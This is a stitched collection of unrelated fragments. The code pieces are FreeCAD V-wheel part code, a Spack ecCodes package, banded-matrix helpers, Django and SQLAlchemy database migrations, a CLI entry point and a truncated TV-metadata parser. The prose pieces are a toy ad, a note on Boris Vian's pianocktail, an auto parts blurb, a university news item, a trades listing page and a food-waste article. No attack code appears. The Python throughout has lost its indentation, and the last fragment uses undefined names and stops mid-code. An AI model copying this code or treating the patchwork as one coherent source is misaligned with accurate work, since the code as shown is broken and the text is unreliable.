# * License as published by the Free Software Foundation; either *
# * version 2.1 of the License, or any later version. *
# * *
# * This library is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *
# * Lesser General Public License for more details. *
# * *
# * You should have received a copy of the GNU Lesser General Public *
# * License along with this library; if not, write to the Free Software *
# * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA *
# * *
# **************************************************************************************
import Part
from FreeCAD import Vector
from Part import makeLine
def dualvwheel(params, document):
# no params
name = params["name"]
# still name some quantities
r_1 = 0.5 * 13.89
r_2 = 0.5 * 15.974
r_3 = 9.77
r_4 = 0.5 * 18.75
r_5 = 0.5 * 24.39
# profile for revolution is symmetric, therefore only points from right half
vertices = [
(0, r_1, 0),
(0.5, r_1, 0),
(0.5, r_2, 0),
(0.5 * 10.23 - 0.3, r_2, 0),
(0.5 * 10.23, r_2 + 0.3, 0),
(0.5 * 10.23, r_3, 0),
(0.5 * (10.23 - 4.84), r_5, 0),
(0.5 * (10.23) - 4.84, r_3, 0),
(0.5 * (10.23) - 4.84, r_4, 0),
(0, r_4, 0)
]
lines = []
vlast = None
vcur = Vector(vertices[0])
# right half
for i in range(1, len(vertices)):
vlast = vcur
vcur = Vector(vertices[i])
lines.append(makeLine(vcur, vlast))
# left half
for i in range(len(vertices) - 2, -1, -1):
vlast = vcur
vcur = Vector(vertices[i])
vcur[0] *= -1
lines.append(makeLine(vcur, vlast))
part = document.addObject("Part::Feature", "BOLTS_part")
part.Label = name
part.Shape = Part.Face(
Part.Wire(lines)
).revolve(Vector(0, 0, 0), Vector(1, 0, 0), 360).removeSplitter()
def solidvwheel(params, document):
# no params
name = params["name"]
# still name some quantities
r_1 = 0.5 * 13.89
r_2 = 0.5 * 15.974
r_3 = 9.77
r_4 = 0.5 * 23.89
# profile for revolution is symmetric, therefore only points from right half
vertices = [
(0, r_1, 0),
(0.5, r_1, 0),
(0.5, r_2, 0),
(0.5 * 10.23 - 0.3, r_2, 0),
(0.5 * 10.23, r_2 + 0.3, 0),
(0.5 * 10.23, r_3, 0),
(0.5 * 5.89, r_4, 0),
(0, r_4, 0),
]
lines = []
vlast = None
vcur = Vector(vertices[0])
# right half
for i in range(1, len(vertices)):
vlast = vcur
vcur = Vector(vertices[i])
lines.append(makeLine(vcur, vlast))
# left half
for i in range(len(vertices) - 2, -1, -1):
vlast = vcur
vcur = Vector(vertices[i])
vcur[0] *= -1
lines.append(makeLine(vcur, vlast))
part = document.addObject("Part::Feature", "BOLTS_part")
part.Label = name
part.Shape = Part.Face(
Part.Wire(lines)
).revolve(Vector(0, 0, 0), Vector(1, 0, 0), 360).removeSplitter()
def minivwheel(params, document):
# no params
name = params["name"]
# still name some quantities
r_1 = 0.5 * 8.64
r_2 = 0.5 * 9.974
r_3 = 0.5 * 12.21
r_4 = 0.5 * 15.23
# profile for revolution is symmetric, therefore only points from right half
vertices = [
(0, r_1, 0),
(0.5, r_1, 0),
(0.5, r_2, 0),
(0.5 * 8.8 - 0.3, r_2, 0),
(0.5 * 8.8, r_2 + 0.3, 0),
(0.5 * 8.8, r_3, 0),
(0.5 * 5.78, r_4, 0),
(0, r_4, 0),
]
lines = []
vlast = None
vcur = Vector(vertices[0])
# right half
for i in range(1, len(vertices)):
vlast = vcur
vcur = Vector(vertices[i])
lines.append(makeLine(vcur, vlast))
# left half
for i in range(len(vertices) - 2, -1, -1):
vlast = vcur
vcur = Vector(vertices[i])
vcur[0] *= -1
lines.append(makeLine(vcur, vlast))
part = document.addObject("Part::Feature", "BOLTS_part")
part.Label = name
part.Shape = Part.Face(
Part.Wire(lines)
).revolve(Vector(0, 0, 0), Vector(1, 0, 0), 360).removeSplitter()
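# Usage sketch (an assumption-laden example, not part of BOLTS itself): these
# functions are plain callbacks that BOLTS invokes with a parameter dict and
# the target FreeCAD document, so calling one by hand looks like this:
#
#   import FreeCAD
#   doc = FreeCAD.newDocument()
#   solidvwheel({"name": "solid V wheel"}, doc)
#   doc.recompute()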
|
Buddy Bunny is the perfect snuggle companion - just look at those ears! With a soft organic cotton body filled with corn fibre, she is suitable for the youngest, most delicate of skins, from birth and beyond - because let's face it, once they have had their very first cuddle, they won't ever want to let her go.
A beautiful new baby gift to treasure forever.
100% GOTS certified organic cotton with corn fibre filling. |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
#
from spack import *
class Eccodes(CMakePackage):
"""ecCodes is a package developed by ECMWF for processing meteorological
data in GRIB (1/2), BUFR (3/4) and GTS header formats."""
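# Example spec (a sketch exercising the variants declared below):
#
#   spack install eccodes@2.5.0 +netcdf +png jp2k=openjpeg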
homepage = "https://software.ecmwf.int/wiki/display/ECC/ecCodes+Home"
url = "https://software.ecmwf.int/wiki/download/attachments/45757960/eccodes-2.2.0-Source.tar.gz?api=v2"
list_url = "https://software.ecmwf.int/wiki/display/ECC/Releases"
version('2.5.0', '5a7e92c58418d855082fa573efd352aa')
version('2.2.0', 'b27e6f0a3eea5b92dac37372e4c45a62')
variant('netcdf', default=False,
description='Enable GRIB to NetCDF conversion tool')
variant('jp2k', default='openjpeg', values=('openjpeg', 'jasper', 'none'),
description='Specify JPEG2000 decoding/encoding backend')
variant('png', default=False,
description='Enable PNG support for decoding/encoding')
variant('aec', default=False,
description='Enable Adaptive Entropy Coding for decoding/encoding')
variant('pthreads', default=False,
description='Enable POSIX threads')
variant('openmp', default=False,
description='Enable OpenMP threads')
variant('memfs', default=False,
description='Enable memory based access to definitions/samples')
variant('python', default=False,
description='Enable the Python interface')
variant('fortran', default=True, description='Enable the Fortran support')
variant('build_type', default='RelWithDebInfo',
description='The build type to build',
values=('Debug', 'Release', 'RelWithDebInfo', 'Production'))
depends_on('netcdf', when='+netcdf')
depends_on('openjpeg', when='jp2k=openjpeg')
depends_on('jasper', when='jp2k=jasper')
depends_on('libpng', when='+png')
depends_on('libaec', when='+aec')
depends_on('python@:2', when='+python')
depends_on('py-numpy', when='+python', type=('build', 'run'))
extends('python', when='+python')
conflicts('+openmp', when='+pthreads',
msg='Cannot enable both POSIX threads and OMP')
# The following enforces linking against the specified JPEG2000 backend.
patch('enable_only_openjpeg.patch', when='jp2k=openjpeg')
patch('enable_only_jasper.patch', when='jp2k=jasper')
def cmake_args(self):
variants = ['+netcdf', '+png', '+aec', '+pthreads',
'+openmp', '+memfs', '+python', '+fortran']
options = ['NETCDF', 'PNG', 'AEC', 'ECCODES_THREADS',
'ECCODES_OMP_THREADS', 'MEMFS', 'PYTHON', 'FORTRAN']
# Use a list (not a Python 3 map iterator) so that args.append below works.
args = ["-DENABLE_%s=%s" % (opt, 'ON' if var in self.spec else 'OFF')
        for var, opt in zip(variants, options)]
if self.spec.variants['jp2k'].value == 'none':
args.append('-DENABLE_JPG=OFF')
else:
args.append('-DENABLE_JPG=ON')
return args
|
It seems Boris Vian wasn’t the only Frenchman keen on combining music and other senses. In 1922, Science and Invention featured an illustration of a scent organ inspired by perfumer and chemist Dr. Septimus Piesse’s theories about syncing scent and musical notes. When played, Piesse’s scent organ, like Vian’s pianocktail, would produce an odor (or a cocktail in Vian’s case) that corresponds to a given pattern tapped on the organ’s keys. Notorious jazzman Vian took it a step further, however, by simultaneously producing a cocktail representation of a musical tune.
We eagerly anticipate the appearance of his pianocktail in Michel Gondry’s film adaptation of Vian’s novel. Mood Indigo is slated for release in early spring 2013. |
# -*- coding: utf-8 -*-
"""
chemreac.util.banded
--------------------
this module contains functions to deal with banded matrices.
"""
from __future__ import (absolute_import, division, print_function)
import numpy as np
def get_banded(A, n, N, n_jac_diags=1, order='C', padded=False):
""" Turns a dense matrix into a banded one
Turns a dense matrix of shape (n·N) × (n·N) into a banded matrix
including the diagonal and n·n_jac_diags super-diagonals and
n·n_jac_diags sub-diagonals.
Parameters
----------
A: 2-dimensional square matrix
n: int
sub-block dimension
N: int
number of super-blocks
n_jac_diags: int
number of diagonals (default: 1)
order: {'C', 'F'}, optional
C- or Fortran-contiguous
padded: bool, optional
default: False, if True: A is padded with n rows along the top
Raises
------
ValueError on mismatch of A.shape and n*N
"""
if A.shape != (n*N, n*N):
raise ValueError("Shape of A != (n*N, n*N)")
nouter = n * n_jac_diags
B = np.zeros(((3 if padded else 2)*nouter + 1, n*N), order=order)
for ri in range(n*N):
for ci in range(max(0, ri-nouter), min(n*N, ri+nouter+1)):
B[(2 if padded else 1)*nouter+ri-ci, ci] = A[ri, ci]
return B
def get_jac_row_from_banded(J, rows, n, n_jac_diags=1):
"""
Extracts rows from a banded matrix J
Parameters
----------
J: 2-dimensional array
Source matrix with banded storage.
rows: sequence
indices of rows to extract
n: integer
row length
n_jac_diags: integer
number of diagonals (default: 1)
"""
out = np.empty((len(rows), n))
nouter = n * n_jac_diags
for i, ri in enumerate(rows):
    for ci in range(n):
        out[i, ci] = J[nouter+ri-ci, ci]
return out
def get_dense(A, n, N, padded=False, n_jac_diags=1):
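""" Inverse of get_banded: reconstructs the dense (n·N) × (n·N) matrix
from its banded storage A; ``padded`` indicates whether A carries the
extra n·n_jac_diags padding rows on top. """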
out = np.zeros((n*N, n*N))
nouter = n * n_jac_diags
diag_offset = 2*nouter if padded else nouter
for ri in range(n*N):
for ci in range(max(0, ri-nouter), min(n*N, ri+nouter+1)):
out[ri, ci] = A[diag_offset+ri-ci, ci]
return out
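# Round-trip sketch (assuming chemreac is importable): a matrix whose entries
# lie within the band survives get_banded followed by get_dense unchanged.
#
#   import numpy as np
#   from chemreac.util.banded import get_banded, get_dense
#
#   n, N = 2, 3  # 2x2 sub-blocks, 3 super-blocks -> a 6x6 matrix
#   A = np.zeros((n*N, n*N))
#   for ri in range(n*N):
#       for ci in range(max(0, ri-n), min(n*N, ri+n+1)):
#           A[ri, ci] = 10*ri + ci
#
#   B = get_banded(A, n, N)  # banded storage of shape (2*n + 1, n*N) == (5, 6)
#   assert np.allclose(get_dense(B, n, N), A)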
|
American Shifter's Neutral Safety Switch / Backup Switch Kit is designed to add a safety switch or a back up switch to your ride. It can operate one or the other but not both. Kit includes brackets, switch, and detailed instructions. |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Fee'
db.create_table(u'ratechecker_fee', (
('fee_id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('plan', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ratechecker.Product'])),
('product_id', self.gf('django.db.models.fields.IntegerField')()),
('state_id', self.gf('localflavor.us.models.USStateField')(max_length=2)),
('lender', self.gf('django.db.models.fields.CharField')(max_length=16)),
('single_family', self.gf('django.db.models.fields.BooleanField')(default=True)),
('condo', self.gf('django.db.models.fields.BooleanField')(default=False)),
('coop', self.gf('django.db.models.fields.BooleanField')(default=False)),
('origination_dollar', self.gf('django.db.models.fields.DecimalField')(max_digits=8, decimal_places=2)),
('origination_percent', self.gf('django.db.models.fields.DecimalField')(max_digits=6, decimal_places=3)),
('third_party', self.gf('django.db.models.fields.DecimalField')(max_digits=8, decimal_places=2)),
('data_timestamp', self.gf('django.db.models.fields.DateTimeField')()),
))
db.send_create_signal(u'ratechecker', ['Fee'])
# Adding unique constraint on 'Fee', fields ['product_id', 'state_id', 'lender', 'single_family', 'condo', 'coop']
db.create_unique(u'ratechecker_fee', ['product_id', 'state_id', 'lender', 'single_family', 'condo', 'coop'])
def backwards(self, orm):
# Removing unique constraint on 'Fee', fields ['product_id', 'state_id', 'lender', 'single_family', 'condo', 'coop']
db.delete_unique(u'ratechecker_fee', ['product_id', 'state_id', 'lender', 'single_family', 'condo', 'coop'])
# Deleting model 'Fee'
db.delete_table(u'ratechecker_fee')
models = {
u'ratechecker.adjustment': {
'Meta': {'object_name': 'Adjustment'},
'adj_value': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '3'}),
'affect_rate_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'data_timestamp': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_fico': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'max_loan_amt': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2'}),
'max_ltv': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '3'}),
'min_fico': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'min_loan_amt': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2'}),
'min_ltv': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '3'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ratechecker.Product']"}),
'prop_type': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'rule_id': ('django.db.models.fields.IntegerField', [], {}),
'state': ('localflavor.us.models.USStateField', [], {'max_length': '2', 'null': 'True'})
},
u'ratechecker.fee': {
'Meta': {'unique_together': "(('product_id', 'state_id', 'lender', 'single_family', 'condo', 'coop'),)", 'object_name': 'Fee'},
'condo': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'coop': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'data_timestamp': ('django.db.models.fields.DateTimeField', [], {}),
'fee_id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lender': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'origination_dollar': ('django.db.models.fields.DecimalField', [], {'max_digits': '8', 'decimal_places': '2'}),
'origination_percent': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'}),
'plan': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ratechecker.Product']"}),
'product_id': ('django.db.models.fields.IntegerField', [], {}),
'single_family': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'state_id': ('localflavor.us.models.USStateField', [], {'max_length': '2'}),
'third_party': ('django.db.models.fields.DecimalField', [], {'max_digits': '8', 'decimal_places': '2'})
},
u'ratechecker.product': {
'Meta': {'object_name': 'Product'},
'adj_period': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
'ai_value': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '4'}),
'annual_cap': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'arm_index': ('django.db.models.fields.CharField', [], {'max_length': '96', 'null': 'True'}),
'arm_margin': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '4'}),
'condo': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'coop': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'data_timestamp': ('django.db.models.fields.DateTimeField', [], {}),
'institution': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'int_adj_cap': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'int_adj_term': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'io': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'loan_cap': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'loan_purpose': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
'loan_term': ('django.db.models.fields.IntegerField', [], {}),
'loan_type': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
'max_fico': ('django.db.models.fields.IntegerField', [], {}),
'max_loan_amt': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'max_ltv': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '3'}),
'min_fico': ('django.db.models.fields.IntegerField', [], {}),
'min_loan_amt': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'min_ltv': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '3'}),
'plan_id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'pmt_type': ('django.db.models.fields.CharField', [], {'default': "'FIXED'", 'max_length': '12'}),
'single_family': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
u'ratechecker.rate': {
'Meta': {'object_name': 'Rate'},
'base_rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'}),
'data_timestamp': ('django.db.models.fields.DateTimeField', [], {}),
'lock': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ratechecker.Product']"}),
'rate_id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True'}),
'region_id': ('django.db.models.fields.IntegerField', [], {}),
'total_points': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'})
},
u'ratechecker.region': {
'Meta': {'object_name': 'Region'},
'data_timestamp': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'region_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'state_id': ('localflavor.us.models.USStateField', [], {'max_length': '2'})
}
}
complete_apps = ['ratechecker']
|
According to IAU public relations, Dr. Mirzadeh presented an overview of the status of IAU and acknowledged the influential role of the university's pioneers and founders, such as Ayatollah Hashemi Rafsanjani, in establishing IAU as the largest brick-and-mortar university in the world.
Mirzadeh noted that IAU admits students in all academic fields and at all levels, and currently ranks 162nd in the ESI database for global science production. He mentioned that 68 thousand faculty members and professors are active at the university - a tremendous asset for international universities interested in further cooperation. In addition to running 4 international branches, IAU has so far launched international offices in Italy, Germany, Russia and Oman, and plans are in place to further develop its international activities.
In this meeting, Austrian ambassador Friedrich Stift stated that the Austrian government welcomes cooperation with IAU, including the university running an office in Austria.
Stift made specific mention of cooperation in medical and paramedical training, the development of international relations, and scientific and technological collaboration between universities of both countries, and said that the Austrian government shall support further endeavours in related fields.
"""
Description: op platform top entrance
"""
import argparse
from utils import pcom
from conf import settings
from core import runner_admin
from core import runner_init
from core import runner_flow
from core import runner_backup
from lic.op_lic import OPClient
LOG = pcom.gen_logger(__name__)
def gen_admin_parser(subparsers):
"""to generate admin parser"""
admin_parser = subparsers.add_parser(
"admin",
help="sub cmd about kicking off project related actions")
me_group = admin_parser.add_mutually_exclusive_group()
me_group.add_argument(
"-list", dest="admin_list_proj", action="store_true",
help="toggle to list all currently available proj names")
me_group.add_argument(
"-list_lab", dest="admin_list_lab", action="store_true",
help="toggle to list all currently available lab names")
me_group.add_argument(
"-p", dest="admin_proj_name",
help="input the proj name which will be kicked off")
me_group.add_argument(
"-b", dest="admin_block_lst", nargs="+",
help="input the block names to be initialized in the specified project")
me_group.add_argument(
"-update_blk", dest="admin_update_blk", nargs="*",
help="toggle or input blocks to update blocks directory according to RELEASE directory")
me_group.add_argument(
"-list_lib", dest="admin_list_lib", action="store_true",
help="toggle to list all available lib process names")
me_group.add_argument(
"-lib", dest="admin_lib", nargs="*",
help="toggle or input lib processes to generate library mapping links and related files")
me_group.add_argument(
"-lib_type", dest="admin_lib_type", nargs="+",
help="input the lib_types, e.g. std, tech, mem, ip, io")
me_group.add_argument(
"-release_check", dest="admin_release_check", action="store_true",
help="toggle to check the block released json files")
me_group.add_argument(
"-release", dest="admin_release", action="store_true",
help="toggle to release block files")
admin_parser.set_defaults(func=main_admin)
def main_admin(args):
"""init sub cmd top function"""
runner_admin.run_admin(args)
def gen_init_parser(subparsers):
"""to generate init parser"""
init_parser = subparsers.add_parser(
"init",
help="sub cmd about generating initial project directories")
me_group = init_parser.add_mutually_exclusive_group()
me_group.add_argument(
"-list", dest="init_list_proj", action="store_true",
help="toggle to list all currently available proj names")
me_group.add_argument(
"-list_lab", dest="init_list_lab", action="store_true",
help="toggle to list all currently available lab names")
me_group.add_argument(
"-p", dest="init_proj_name",
help="input the proj name which will be check out from repository")
init_parser.add_argument(
"-b", dest="init_block_name_lst", nargs="+",
help="input the block name which will be check out from repository")
init_parser.set_defaults(func=main_init)
def main_init(args):
"""init sub cmd top function"""
runner_init.run_init(args)
def gen_flow_parser(subparsers):
"""to generate flow parser"""
flow_parser = subparsers.add_parser(
"flow",
help="sub cmd about running and controlling backend flows")
me_group = flow_parser.add_mutually_exclusive_group()
me_group.add_argument(
"-list_env", dest="flow_list_env", action="store_true",
help="toggle to list all internal environment variables")
me_group.add_argument(
"-list_blk", dest="flow_list_blk", action="store_true",
help="toggle to list all available blocks")
me_group.add_argument(
"-list_flow", dest="flow_list_flow", action="store_true",
help="toggle to list all available flows")
me_group.add_argument(
"-list_diff", dest="flow_list_diff", nargs='?', const='DEFAULT',
metavar='FLOW_NAME',
help="""toggle to demonstrate the diff between block level config/plugins
and proj level one (default: FLOW_NAME=DEFAULT)""")
me_group.add_argument(
"-init", dest="flow_init_lst", nargs="+",
help="input flow initial name list to generate flow config files")
me_group.add_argument(
"-gen", dest="flow_gen_lst", nargs="*",
help="toggle and input flows to generate flow run files")
me_group.add_argument(
"-run", dest="flow_run_lst", nargs="*",
help="toggle and input flows to run flow")
flow_parser.add_argument(
"-force", dest="flow_force", default=False, nargs="?",
help="toggle and input begin sub-stage to run force to ignore last status")
flow_parser.add_argument(
"-auto_release", dest="flow_auto_release", action="store_true",
help="for ext sub_stage auot release")
flow_parser.add_argument(
"-auto_run", dest="flow_auto_run", action="store_true",
help="for sta flow auto run")
flow_parser.add_argument(
"-begin", dest="flow_begin", default="",
help="input begin sub-stage to run")
flow_parser.add_argument(
"-end", dest="flow_end", default="",
help="input end sub_stage to run")
flow_parser.add_argument(
"-c", dest="flow_comment", default="",
help="input flow comments to be shown and distinguished with others")
me_group.add_argument(
"-show_var", dest="flow_show_var_lst", nargs="*",
help="toggle and input flows to list all variables passed to templates")
me_group.add_argument(
"-restore", dest="flow_restore", default="",
help="input flow::stage:sub-stage to restore")
me_group.add_argument(
"-release", dest="flow_release_lst", nargs="+",
help="input multiple flow::stage:sub-stage to release")
flow_parser.add_argument(
"-yes", dest="flow_cfm_yes", action="store_true",
help="toggle flows to give all yes response to flow inline prompt hint")
flow_parser.set_defaults(func=main_flow)
def main_flow(args):
"""flow sub cmd top function"""
runner_flow.run_flow(args)
def gen_backup_parser(subparsers):
"""to generate backup parser"""
backup_parser = subparsers.add_parser(
"backup",
help="sub cmd about backup project directories")
me_group = backup_parser.add_mutually_exclusive_group()
me_group.add_argument(
"-p", dest="backup_proj_name",
help="input the proj name which to be backup by super user")
backup_parser.set_defaults(func=main_backup)
def main_backup(args):
"""backup sub cmd top function"""
runner_backup.run_backup(args)
def gen_args_top():
"""to generate top args help for op"""
parser = argparse.ArgumentParser()
parser.add_argument(
"-v", dest="version", action="store_true",
help="show op version info and exit")
subparsers = parser.add_subparsers()
gen_admin_parser(subparsers)
gen_init_parser(subparsers)
gen_flow_parser(subparsers)
gen_backup_parser(subparsers)
return parser.parse_args()
def main():
"""op top function"""
args = gen_args_top()
if args.version:
print("OnePiece Platform Version: op 4.0.0")
return
if not settings.DEBUG:
opclient = OPClient()
opclient.set_license_server()
opclient.checkout_license()
if hasattr(args, "func"):
try:
args.func(args)
except KeyboardInterrupt:
LOG.critical("op terminated")
except SystemExit:
LOG.critical("op failed")
else:
LOG.info("op completed")
else:
LOG.critical("sub cmd is NA, please use -h to check all sub cmds")
if not settings.DEBUG:
opclient.checkin_license()
|
Best match results for bathroom basin & sink suppliers in Panania + 30km.
Find the best tradesmen, home improvement and repair professionals or suppliers for your project on HomeImprovement2day. We have listings for all the trades and suppliers you need to help you whether you are renovating, building or just need something repaired or maintained in and around your home, including bathroom basin & sink suppliers in Panania (2213).
There is no time like today to get started on those much needed renovations and repairs around your home. HomeImprovement2day has all the tradesmen, home improvement professionals and suppliers you will need for any project, including bathroom basin & sink suppliers in Panania (2213). Are you a home improvement business that wants to generate quality leads and increase your business's online exposure? List your business today, for free!
# Copyright 2014 Hewlett-Packard Company
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sql
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine; bind
# migrate_engine to your metadata
meta = sql.MetaData()
meta.bind = migrate_engine
endpoint_group_table = sql.Table(
'endpoint_group',
meta,
sql.Column('id', sql.String(64), primary_key=True),
sql.Column('name', sql.String(255), nullable=False),
sql.Column('description', sql.Text, nullable=True),
sql.Column('filters', sql.Text(), nullable=False))
endpoint_group_table.create(migrate_engine, checkfirst=True)
project_endpoint_group_table = sql.Table(
'project_endpoint_group',
meta,
sql.Column('endpoint_group_id', sql.String(64),
sql.ForeignKey('endpoint_group.id'), nullable=False),
sql.Column('project_id', sql.String(64), nullable=False),
sql.PrimaryKeyConstraint('endpoint_group_id',
'project_id'))
project_endpoint_group_table.create(migrate_engine, checkfirst=True)
|
The eradication of food waste is a goal arguably more important than any other for stakeholders in food supply chains, yet, not surprisingly, it is one rarely observed in the key performance indicators (KPIs) employed by supply chain professionals or by retail operators as they strive to measure the overall success of their efforts.
There is a social and environmental urgency to eliminate food waste from supply chains and operations - in the United States alone as much as 30 percent of food, valued at roughly $48 billion, is thrown away each year. Supply chain professionals can work toward success by raising awareness about this issue through quantification and tracking of food waste.
One of the enduring mantras of management is that you can't manage what you can't measure, and this is equally true for food waste. One early adopter of this approach is Tesco, which has introduced transparency into its food loss reporting.
During 2013/2014, over 62,000 tons of food were wasted in Tesco stores and distribution centres in the UK. While this amount represents less than one percent of food products sold during this period, Tesco continues to work toward decreasing this amount - an objective that makes commercial as well as social sense.
Drilling deeper, Tesco has developed food waste profiles for its 25 most frequently purchased perishable products, and set in place initiatives to reduce waste associated with them.
Regardless of whether your company deems food waste a KPI, it certainly warrants being quantified, tracked, and managed, with an eye toward reducing its environmental impact and benefitting those in need. Attention to cold chain best practices, field and packing sheds, and temperature maintenance are just a few of the ways fresh produce companies can make food waste reduction a priority.
To learn more on this topic, download 3 Ways to Eradicate Food Waste and Measure Success. |
import os, constants, functions, lxml, logging
from functions import XMLFromURL, GetElementText
from lxml import etree
from lxml.builder import E
from lxml.etree import Element, SubElement, Comment
def ParseNoFromSeason(season, episode, default):
#if season == 0 and episode == 0:
# return "S" + str(default).zfill(2) + "E00"
#else:
return "S" + str(season).zfill(2) + "E" + str(episode).zfill(2)
class TvDB(constants.Series):
def __init__(self, id):
logging.Log_Milestone("TvDB" + "_" + id)
self.ID = id
self.MetaType = "Tvdb"
data = XMLFromURL(constants.TVDB_HTTP_API_URL % id, id + ".xml", os.path.join("TvDB", id), CACHE_1HOUR * 24).xpath("""/Data""")
if data != None:
data = data[0]
##--------------------------------Title--------------------------------##
if GetElementText(data, "Series/SeriesName"):
self.Title = str(GetElementText(data, "Series/SeriesName")).encode('utf-8').strip().translate(constants.ReplaceChars)
##--------------------------------Summary------------------------------##
if GetElementText(data, "Series/Overview"):
self.Summary = GetElementText(data, "Series/Overview")
##--------------------------------Originally_Available_At--------------##
if GetElementText(data, "Series/FirstAired"):
self.Originally_Available_At = GetElementText(data, "Series/FirstAired")
##--------------------------------Rating-------------------------------##
if GetElementText(data, "Series/Rating"):
self.Rating = GetElementText(data, "Series/Rating")
##--------------------------------Studio-------------------------------##
if GetElementText(data, "Series/Network"):
self.Studio = GetElementText(data, "Series/Network")
##--------------------------------Countries----------------------------##
##--------------------------------Genres-------------------------------##
if GetElementText(data, "Series/Genre"):
self.Genres = filter(None, GetElementText(data, "Series/Genre").split("|"))
##--------------------------------Tags---------------------------------##
##--------------------------------Collections--------------------------##
##--------------------------------Content_Rating-----------------------##
if GetElementText(data, "Series/ContentRating"):
self.Content_Rating = GetElementText(data, "Series/ContentRating")
##--------------------------------Writers------------------------------##
##--------------------------------Directors----------------------------##
##--------------------------------Producers----------------------------##
##--------------------------------Roles--------------------------------##
self.Roles = []
##--------------------------------Images-------------------------------##
banners = []
bannersXml = XMLFromURL(constants.TVDB_BANNERS_URL % id, id + "_banners.xml", os.path.join("TvDB", id), CACHE_1HOUR * 24)
if bannersXml:
art = etree.tostring(E.Images(), pretty_print=True, xml_declaration=True, encoding="UTF-8")
art = XML.ElementFromString(art)
artCount = 2
posters = etree.tostring(E.Images(), pretty_print=True, xml_declaration=True, encoding="UTF-8")
posters = XML.ElementFromString(posters)
postersCount = 2
banners = etree.tostring(E.Images(), pretty_print=True, xml_declaration=True, encoding="UTF-8")
banners = XML.ElementFromString(banners)
bannersCount = 2
season = etree.tostring(E.Images(), pretty_print=True, xml_declaration=True, encoding="UTF-8")
season = XML.ElementFromString(season)
seasonCount = []
